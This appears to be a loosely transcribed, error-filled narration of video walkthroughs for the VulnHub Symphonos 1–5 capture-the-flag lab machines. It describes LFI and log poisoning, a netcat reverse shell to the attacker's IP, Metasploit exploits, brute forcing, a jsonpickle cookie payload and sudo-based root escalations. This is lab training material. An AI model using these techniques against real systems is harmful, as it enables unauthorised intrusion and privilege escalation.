Hello friends, today we are learning a new machines Symphonos 1. So basically it's beginner real life based machine designed to a tech interesting way of obtaining a low privilege cell. Should work for both VMware and VirtualBox. We are using the VirtualBox. First of all download it, and there is note also you may need to update your host file for symphonos.local. So I'm already open this machine. So let's scan through the rpux scan sudo scan -l, and our IP is 192.168.121 because as usually PCS system technique is running on VulnHub machine. Let's check our IP ifconfig, and as you can see that there is a note set the host file system symphonos.local in the local server. Set this file sudo no it is a host. I'm already set this file, so let's close it. After that I'm scanning through the nmap automator. There is port number 22 open and port number 25 port number 80 TCP port, and you can see this SMTP and STP server are running, service are running. There is scan also, mostly all scans, and we are using the SMB client scan. There is the directory of Anonymous. First we are check the port number 80, it's a web page or not. 192.168.1.21. let's visit that website. We are visit that website. Let's connect to the SMB services through the network shared folder. There is two folder. The first directory is Anonymous. There is a file attention.txt. Just check it. Yeah, there is some credential. Can user please stop using this like this password? So I think so there is a password or correctly. Let's check this password. Copy. After that we can alias. So username is alias and password let's try correctly. In the attention.txt file we have received that password. Okay, so there is two file research.txt, trudeau.txt. so let's check the trudeau.txt. there is work on /s3 l105. actually let's have work on this file, so let's enter it. So you can see that Helio site just another website WordPress. So we are using a WordPress scan. Just split the view. WP scan. URL symphonos.local because we are setting this, and we are work on S3L105. let's enumerate that. You can see that there is some plugin identified. Mail Masta. It's a plugin URL. So basically it's a 1.0 outdated version. In the passive detection You can see that there is version 1.0 80% confidence, and there is a file also readme.txt. I am already checked this file. There is a LFI vulnerability, local file inclusion. Let's search for the local file inclusion mail masta exploit. In the exploit DB, you can enter mail space masta 1.0 version. So you can see that there is a proper exploit WordPress plugin masta mail masta 1.0 local file inclusion. So let's open it and check the raw content. There is a URL service also, server WP content plugins mail masta count of send PHP pl etc slash past uploaded file. So let's copy the URL from the WP scan and just use it after the. Now you can see that our past uploaded content shown web. So basically it's work. So you are remembering that there is Nmap automator, there is port number 25 SMTP service also is running. So we are using telnet service on port number 25. Just use this service, send a simple mail transfer protocol, send a mail from okay and receive it as CPT to user is Helios HELIOS Helios. Enter, check the data content. Yeah, there is one more command I will show you. PHP command for the get content of commands. Check the ID for the reverse connection we are using in simple mail transfer protocol. After this command you can enter and type the dot, after that enter. Now it's okay queued. Now get back to the browser and slash change the directory var slash mail. I'm already set this var slash mail slash Helios user and C, because we are using in the mail there is get C. So now we are showing the whole ID, user ID Helios, group ID also. So now we can use the netget command reverse connection through the netget -e. Copy that. In a new tab, reverse connection, we are using port number 1234. Just enter the URL. And see space -e slash pin sh. 192.168.1.10 our IP, and we are reverse connection on port number 1234. Let's enter that. Now we are connected. So first of all, establish this shell. After the establish, let's using the find prem command for check the permission for the privilege escalation. So now you can see that there is some directories in the permission, and our directories working is slash opt slash status check. So first of all, change the directory temp cd slash temp. Now we are in the temp. Just use the call path curl file in bin sh curl file. Through the echo command, now chmod proper permission for this file curl. After that, export the path. First we can check the through the echo command, set the path. Now export the path in the temp directory. Now our path is successfully exported. Now we are using the slash opt status check. After that, paste it. Now you can see this. There is hash. Now let's check who am I. It's root ls curl file. Now change the directory of root ls. There is the flag. Now use cat command proof.txt. So we are successfully captured this flag. Congrats on routing Symphonos 1. So it's basically boot to root challenge and offensive machine. Thanks for watching this video. Hello friends, today we are take a Symphonos 2 machine learning about the boot to root challenge CTF. So as you can see that there is description OSCP like intermediate real life based machine design to teach the importance of understanding a vulnerability should work for both VMware and VirtualBox. We are using the VirtualBox, and now let's see the VirtualBox. I'm already start the machine. After the setup you start the machine, and now let's scan the network. For scanning the network we are using the arp scan sudo arp scan -l. As you know that in the DC series the VulnHub as usually use the PCS system technique. So there is PCS system technique. So our IP is my machine IP is 192.168.1.159. So let's run a scan through the nmap, but now I'm using the nmap automata. So let's compile the nmap automata. You can see that dot slash for the compiling nmap automated .sh file 192.168.1.159 our IP target machine IP, and all for the techniques. Let's enter. Now you can see this we are in the user, we are not in the root user, that's why it's asking the password. Let's enter the password. Now it takes some time. As you see, there is old default nm4 linux, fuf nicto, smb client, smb map, snmap check, snmap work. There are many scans because the automated tool always use the all scan. So let's check. Starting port scan, there are 5 port open, 21 TCP, FTP protocol, SSH protocol and HTTP protocol, and NetBIOS and Microsoft DBS. And there is port FTP protocol, Pro FTPD 1.3.5. As you know that there is FTP service and version, so I think so it's vulnerable. Let's see that. And SSS also. And port number 80. So port number 80, it's a web based. So let's check our IP 192.168.1. So sorry, 192.168.1.159. So it's a website. After that there is 139 NetBIOS Samba workgroup services. There's operating system is Unix Linux. So basically it's a Linux based operating system. Now you can see this host script. We are enumerate whole thing. As you can see that there is UDP ports also, and running for CV scan all ports, VLAN scans. Basically these scan give a exploit also. Pro FTPD, it's vulnerable. Let's check the thing. Now we'll run the nm4 Linux scan. So let's see the nm4 Linux. There's nicto. Where is the nm4 Linux? Foof. So as you can see that starting assembly client scan, there is assembly client scan. We have also a assembly client port. We can use the assembly client scan. There is 3 file. It's automatically scanned, and nm for Linux also. So we got the 3 files. Let's connect through the assembly client. So open a new tab and split assembly client. I'm already set this, and basically we got the assembly client. In the work group there is name of anonymous. So let's check the anonymous. What is that? Just a minute. Changing the path. Now assembly client 192 //192.168.1.5 our machine IP. Symphonos is 2. There is assembly client work group and so let's enter. For the password, normal enter because there is no password. Let's check ls. Now you can see that there is 4 files backups. So first of all we are check the backups. cd backups. Now ls. Now you can see that in the backup there is a file log.txt. Let's get this file. I think so there is some confidential credential information in this file. Check the file because it's log file log.txt get. So we are get this file. So let's check ls. Here you can see that log.txt get log.txt. Now see this catalog.txt root symphonos 2 sheet slash shadow var backups shadow.back samba configuration sample configuration file for the samba short for Debian. So I think let's check this file whole content. We found a username. There is a path slash home alias slash share. So alias it's a username, but we don't know about the passwords. So let's brute force on this. Copy this username and use the Hydra tool for the brute force. Hydra -l alias -p for password. We are using the file roku.txt and protocol FTP protocol. We are want to log in to SSH, but there was some error, so we are using the FTP protocol because there is the information in FTP protocol. Let's enter it. Wait some time. As you can see this in the FTP protocol, our alias user, we are successfully for the brute forcing Now let's connect to the SSH. It takes some time, that's why I'm skipping this video. So first of all, our login username is alias and the password is password copy. After that, open a new tab in a split view. Let's connect the SSH, but we are connecting in the root user. There is some problem. SSH alias at the rate 192.168.1.159. Let's enter. Copy the password. Enter. Now you can see that we are connected through the SSH user alias. Let's check the present working directory. ls. There is a share folder, but and see this, there is a one more thing, because this website is one on Apache server and there is two service also running, MySQL service and another service running on port number 8080. Let's check this another website. So we are going to this path cd slash etc slash apache 2 slash sites enabled slash now ls. There is a file of librans.config. Let's check this through the cat command. librans.config.conf. Now you can see this, there is virtual host 127.0.0 document root opt libran nms html. So there is libran nms. So let's log in through the password. But it's now not, there is no login page. So we are connecting a local host. We are cancel this cell and another ssh hyphen l in a local host. SSH space hyphen l space 8080 port number, because you can see that there is 8080 port number and 127.0.0.1. It's our local host, virtual host through the alias. Let's connect. Password is same as that. We are again connect. Now open a local host port number 8080. So you can see this, there is libre nms. Let's try to log in through the alias. The password is, now you can see this, we are in logged in libre nms. So I think it's a vulnerability. Let's search the exploit for the libre nms. We are using the metasploit framework. Through the command is msf console. Search. nms. There is two payload exploit Linux HTTP libnms collected cmd injection and add host injection. We are using add host injection. There is two reasons, because cmd injection is not working and I'm already tried it. So use the exploit add host. Number first, let's check the options. What are the requirements? Set the password. Set the R host. We are set in R host localhost. Set R host localhost, because we are using the local host, and R port is 8080. R port 8080. After that, there is username requirement. Set username. Username is alias AEOLUS. Let's check again AEOLUS. Set the lhost. So let's check our IP. ifconfig. So our IP is 192.168.1.34. So let's go back to the Metasploit frameworks. Set lhost 192.168.1.34. So again, let's check the options. So password is set, R host localhost set, R port 8080 set, username is set, L host and L port also set. Let's exploit. Now you can see this. There is session 1 created in the background. Let's check the sessions. There is session ID 1. So sessions -I 1. Let's interact this just a sec. So our ID session ID is 1. Let's enter. So we got the cell. Let's stabilize this cell. Use the command python now you can see this. Now we are in Cron's Symphonos 2, a other user. Let's check. There is sudo permissions, sudo -I for the privilege escalation -L. Now you can see this. There is privilege escalation for the permission in user bin. So let's change the directory cd/user/bin, and we are using, there is a command that time there is a service running, MySQL service running. So there is a command for the MySQL for sudo. So let's use this command. Now you can see this, we got the root shell. Let's check this. Who am I? Root cd / root ls. There is a file proof.txt. So let's get command file name proof.txt. So finally, congratulations, we are captured this Symphonos 2 offensive machine. So there is the old method, and for the password cracking there is one more method. I will not show you. There is also one more method. With the brute force we can use the SMB client also. So thanks for watching this video. So hello friends, welcome back to Symphonos series 3.1. Today we are learn about Symphonos series 3.1 boot to root CTF. So let's start. Open your VirtualBox and start the machine. The machine is started. Open the terminal and scan the network. Through the ARP scan sudo ARP scan -l. As you know that VulnHub uses the PCS system technique. The IP is 192.168.1.3. Let's scan Nmap automator. There are 3 port options: 21, 22, 80. There is 80 port number TCP HTTP service and the 22 is SSH. Let's use the port number 80 service HTTP. The browser 192.168.1.3. Now as you can see that there is an image. Now view the page source. In the inspect, now you can see the view source. There's a green color. It's saying can you boost the underworld. So let's first of all run the dir derp as you can see that in the result is derp. There is CGI bin. CGI is also and there is one more gate. Let's first of copy this link. There is a gate. There is nothing here. We are using the CGI bin because CGI is the common gateway interface. There is forbidden error. You don't have permissions to access these resources. There was the Apache server 2.4.25 Debian server. So we use the underworld. It shows the time and users 0. There is load average. So as you know that if you search on the Google, there is CGI. It's actually there is a critical vulnerability exploit on shell shock. So open the Metasploit and search shell shock. There is some exploits, but we want Apache server, so we are using the exploit multi HTTP Apache mod CGI bash and we execute. Use fast. Set the R host 192.168.1.3. Let's check our IP 1.131. Set the L host and also there are set target URI. And our target URI is let's check the options. There is rhost set and rpath also in /bin target URI lhost. Let's exploit. There is exploit completed but no session was created. There was some error. Let's check again. ifconfig 131 lhost is okay. Now we are again set the target URI. Just a minute. I am again setting the machine. There are IPR change 192.168.1.34. Again using the dub scan because there was some problem. After that, when we are using the shell lock vulnerability and exploit multi HTTP Apache mod CGI bash env execute. Set R host and IL host and target URI. There is session are created. After that session, check the system info. The system info is computer 192.168.1.34 IP IPv4. Operating system is Debian 9.9 Linux 64 architecture. And now get to the shell. Now shell is created. After the establish the shell, for the establish we are using the Python command. Now go to the temp directory. After the temp we are using the TCP dump hyphen capital D. Now it's work. Now I'm using the TCP dump hyphen I allow. Sorry, this is bash. It's TCP TUP. It's not TUP, TCP dump hyphen I. Now wait. There are some credential information about the username and password. And if you don't want to use the ARP scan in the Symphonos biometric, it show the IP IPv4 in the machine. Before some time in the DC series they are not showing this, that's why we are using the ARP scan. Let's give some credential. Let's exit this terminal, this channel. Now you can see this, there is this user, there is a user heads, and the password required for heads passes this. Now we are connecting SSH heads. The IP is 192.168.1.34. Copy the password and paste it. Now we are connected to the SSH. Now open a new tab. We have a binary file. I'll show you. PSPY64. So we are using a local server, Python HTTP server. It's running on port number 8000. Let's get back to the SSH. And go to the temp directory. Use the wget. port number is 1000. File name is pspy64. Now it's available here. Now first of all, give the permission for this file. Now we are running this file dot slash it takes some time, so just wait. There are showing some users has been cronf. It's also using a bin sh, see user bin curl silent. It's opt directory ftp client because our ftp port open, so we have stopped this. Now we have changed the directory opt slash ftp client check the ls. There is two files ftp client.py and status check.txt. First of all, we have checked the ftp client.py, ftp client .py. It is showing some import ftplib. So first of all, use the find command for import the ftplib. I have already set this. There are showing a directory user lib python 2.7 ftplib.py. So let's check this ls-la, copy this path. Now you can see this, there are permission for the root gods. Now you can see that there is permissions. So first of all, we are some changement, use some changement for the bin bash. So use nano and copy this path. Now we are setting their operating system, chmod bin bash. Now save it, Ctrl X. Now we are using the watch. First of all, watch. Sorry, this is not capital letters. Watch ls hyphen la. Now you can see this. There is some directories, the two root heads. And for the three root. Now let's close this. Use the slash bin bash -p Now you can see this. I'm changing the nano command. I'm using the nano command same and the same ch mode, but I'm retype. There was some space problem. After that, I'm using the watch ls-la. After that, ls-la slash binbash, as the result as slash binbash are showing. After that, I'm using this command execute for the binbash space slash bin slash bash. Now it's used showing. Let's check the who am I. It's root head. Let's cd slash root. The permission denied. There's some errors. Oh, we'll check again. Now you can see this. There was that time was some error. That's why I'm reload the machine and reset the machine. After that, I'm using the same thing. And now there is bin bash -p. It's not running. After that, nano import sys. There is no content is changing. After that, I'm using the same ls-la bin bash. After that is bin bash. There is permissions all for roots. And when I'm check who am I, it's root. So let's cd slash root ls cat proof.txt. Now you can see this. Assertive are completed and the machine are sold. We are in the root user. So thanks for watching this video. So hello friends, welcome back to our Symphonos series 4. So let's start. This is the machine of Symphonos 4, and you can see this in the description, its name, and difficulty is intermediate, tested VirtualBox, and about the network DHCP protocol, and the OSCP like intermediate real life based machine designed to tech people the importance of trying harder. This work better with VirtualBox rather than VMware. Yes, it's good for VirtualBox. You know that I'm already started this machine. So our IP is 192.168.1.39. It's already showed. It's IPv4, but we are again search the IP using the rscan sudo. So now you can see this. There is PCS technique, PCS system technique 1.39, 192.1.39. So let's scan this network, scan this IP, our victim machine 1.39 through the nmap automator. So there is two port open, port number ATP, TCP protocol on HTTP. If it's HTTP, so let's open the browser, open a tab, just type the IP because it's a HTTP protocol 192.168.1.39. You can see this, there is an image. Just check the source code, there is nothing. So now we are using the derp tool for the directories. I'm already set this the path of word list because it's a PHP 39. So as you see, there is a two links. So copy the link, open the browser, and we again. So now you can see this, there is a login section. So let's try to the SQL injection, boolean based SQL injection for the login. I'm setting this value and copy this value and same value in the password section through the login. Now it's login. So there is an option in the select a code when we are using select heads. So this is the showing some content. Heads was the god of underworld, and the name eventually came to also describe the home of the dead as well. He was the oldest male child of Mons and RH. So you can see that in the URL section there is a file. So let's try to the SQL. So first we check, just a minute. So there is a 22 port number already open. Port number 22 open SSH. So we are trying to execute, because this website is a PHP link. So we are trying to execute a SSH poisoning for a LFI. So SSH, and we are setting a parameter CMD. Also already are set the parameter, just change the IP. After that we don't know about the password. So let's check again. Before the SSH poisoning, we are executing one more thing. //////// var /log, because there is a log. We are set that time in the inspection of page auth log/auth. So now you can see that there is a root UID, root user ID. So we are using also the SSH poisoning, and we are set the parameter of CMD. So let's use in for the LFI vulnerability trying, and CMD is equal to /cat/etc/past_bluety. Now you can see this, there is response is changed. Now we can see this session opened by user root. So just find out the session invalid user. Where is the invalid user? You can see this. There is etc past uploading all reports. So now we are using the Metasploit framework from the web delivery. So MSF console, so now MSF console is open Metasploit framework. So we are searching web delivery protocol. It's not protocol, it's a web delivery exploit. So you see this, the number one exploit multi-script slash web delivery. It's a manual exploit, we are use it. Now set target. First of all we are checking the options. So there is required some allost and exploit target. And payload is Python. No, we are using the payload is PHP. So first of all set the payload. PHP slash meterpreter slash reverse TTP just copied it. Reverse TCP, set L host, check the IP, I have config. Now you can see this, our IP is 192.168.1.54, 192.168.1.54. Set target 1. Again we are checking the options. Options. So you can see that there is exploit target number 1 PHP and our payload now run this. You can use a command also exploit, but I am also using run, so let's run. Now you can see this, there is a URL php-d allow URL with the IP, copied it. Now we are using in our LFI vulnerability in the web. After that you can see this, there is a session created. So after the session created, check the sessions. You can see this session information www-data @Symphonos is 4 and the IP is also there. So interact with session. Session ID 1, enter. We got our meterpreter, so go to the shell, enter. Now we establish our shell using a Python command. Now our shell is established. So let's check the services. We are using a SS command. I'm already set it. Now you can see this has a -tulpn. Internal server services. So you can see this, there is a TCP protocol listening, and it's open and it's working on local host. So now we are port forwarding through the socket. So we are using the socket command. Socket TCP protocol listen 9999 port number, reuse add fork TCP localhost 8080 because it's work on localhost. Let's enter it. So you can see this, it's working. So now we are starting our burp shoot through the burp command. Go to the proxy tab, open the browser. So 192.168.1.39, and the port is 9999. Let's enter it. So you can see this, when we are entered it, there's a redirect who am I. Let's close it. Now it's a Poseidon first website beta. Welcome back Poseidon. So let's check. Now how using our intercept is on. Now you can see this, there is a cookie username, because in that page, the first website, it's a cookie. Now copy this and select and send to the decoder. Now go to the decoder tab and decode as base 64. Now you can see this, it's decode. So when we are searching about the, it's a pixel JSON string. So we are using a script for the reverse connection, pixel JSON script. I'm already write the script. Copy this script. Sorry. Now we are copy this. So let's encode in base 64. Now copy this string, go to the proxy tab. When we are capture this request and the cookie username, let's replace this. As you can see that in the script I'm using netcat and IP is 1.54 and port number 9898. So we are using a reverse connection. So let's open a new tab. and the netcat -lvp port number 9898. Let's enter. Go back to the bubshoot. After the replace in encode screen, just forward it. After the forwarding, go to the terminal, check it. We are connected. Check the who am I, root id, root cd/root. Now we are root, just ls. There is a flag proof.txt. Just see it. So you can see the our privilege escalation also already completed. So we are capturing the flag. If you have any doubt, tell me in the comment box. So thanks for watching this video. We will meet again in the Symphonos 5 next machine in this series. So hello friends, welcome back. Symphonos 5.2. It's the last machine of this Symphonos series. So let's start. First of all, open your machine and start the machine after the configuration and check the IP. My IP is 1.17, but we are check 3 again. So go to your terminal, split view, sudo apt scan. Now as you can see this, there is PCS system technique. So our IP are same 1.17. Let's use nmap -p -s and IP is 1.17. There is 4 port open, port number 22 SSH and port number 80 TCP. So go to the browser, type the IP 192.168.1.17. Now as you can see this, there is a single image. Let's check the view page source. So there is no source. So let's check the some dir search in the depth. Now you can see this, there is a admin.php page, and in our browser there is no admin page. So let's try admin.php, home.php. Now you can see this, there is home.php, it's redirect to admin.php because response code is 302. So let's try /home.php. Now you can see that there is username, password, login page. So check the page source. Now you can see this, there is a service run php $URL is equal to, there is URL parameter running on. Let's login. We are logging through the bypass star. Now you can see this, we are logging in Symphonos home.php under development. So let's go to the tab on portraits. There is some portraits. Our service are run. admin.php. Let's check the content of admin.php. Find some credentials. Let's redirect. Let's check the view page source. Now in the view page source, you can see this, there is header, the service, there is logout, but there is a PHP session start. the session ID, the password. There is a LDAP service also. Now you can see this our LDAP service port number 389. Let's check. Yeah, so there is a password for this service machine. We have got the password hash. Now we are using a nmap script, NSE script. For decode this hashes nmap. I'm already used this command. Now you can see this nmap 192.168.1.17. this is our IP, and -p port number 389 because our service running is 389 TCP open LDAP, and the script LDAP search script argument and LDAP user cn admin dc Symphonos local. You can see this, there is dc Symphonos local cn admin. Yeah, here is cn admin dc Symphonos local, and this is the password. So local, after that LDAP and LDAP.password. Now I am showing you the full screen. Now you can see this LDAP.password. After that we have put the value of hash. We have quoted this hash value in the page source. Now run the script. After the run the script, we got the user password cracked, and the user is juice. So let's connect the SSH. Let's open a new tab. SSH juice 192.168.1.17, our victim IP, machine IP, and the password is, let's copy the password. Now we got our as shell. Let's check ID. So it's a juice ID. So let's check sudo. I think so there is a sudo. Let's check the permissions. So its user juice may run the following commands on root. No password. There is no password in this command. User bin dpkg dpackage. So there is a website gtfo bins. Let's check the dpackage. For the dpackage binary, for this dpackage binary we are checking sudo because our sudo are running. So there is something says if the binary is allowed to run the super user by sudo, it does not drop the elevated privilege and may be used to access the file system, escalate or maintain privilege access. This invokes the default pager, which is likely to be less. Other functions may be applied. So let's run it, check this. When I paste this command, so there is /bin bash. Let's enter. I'll show you. Sudo dpkg dpackage -l. After it's depackaging, there is, after that we are typing this command !bin sh. Enter. Now we are root. Let's check who am I. We are root. cd /root ls. There is a flag proof.txt. Let's get proof.txt. Now we are captured the flags. So the Symphonos series are completed. Thanks for watching these videos. I think you should like these videos. I'm continuing again in the we are meet in the next session. So goodbye friends.